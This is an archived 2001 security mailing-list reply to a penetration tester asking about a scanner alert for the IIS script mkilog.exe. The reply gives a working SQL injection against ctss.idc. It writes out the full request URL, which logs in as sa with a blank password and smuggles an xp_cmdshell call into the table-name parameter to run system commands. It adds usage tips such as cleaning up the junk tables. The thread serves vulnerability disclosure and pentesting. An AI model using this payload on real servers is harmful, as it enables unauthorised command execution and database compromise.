mkilog.exe simply posts data to ctss.idc, which creates a table based on the parameters it gets: [ctss.idc] Datasource: %ds% Username: %user% Password: %pwd% Template: ct.htx SQLStatement: +create table %table% ( +ClientHost varchar(50), username varchar(50), +LogTime datetime, service varchar( 20), machine varchar( 20), +serverip varchar( 50), processingtime int, bytesrecvd int, +bytessent int, servicestatus int, win32status int, +operation varchar( 200), target varchar(200), parameters text ) If you pass a correct DataSource, User, and Password (LocalServer, sa, blank password for locally installed servers), then change the table to: bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");-- You can use it to run system commands. In this case, the actual query you would send is (lines probably wrapped): /scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");-- For every query you run you have to create another garbage table, so remeber to cleanup all those bogus tables when you are done. For some reason SQL Server 6.5 limits your command parameter to 30 characters when executed this way (which is _really_ annoying), I haven't been able to track down why yet. Goodluck! -HD http://www.digitaloffense.net (play) http://www.digitaldefense.net (work) On Tuesday 31 July 2001 06:48 am, César González wrote: > Hello all, > > I am making a penetration testing, and some vulnerability scanners alert > about the script mkilog.exe. Most exactly nessus said the following : > > The CGI /scripts/tools/mkilog.exe is present. > > This CGI allows an attacker to view and modify SQL database > contents. > > No securityfocus links, CVE advisory, etc. i have search most popular > security search engines but nothing appears. Any help will be appreciated. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Tue Jul 31 2001 - 15:19:31 PDT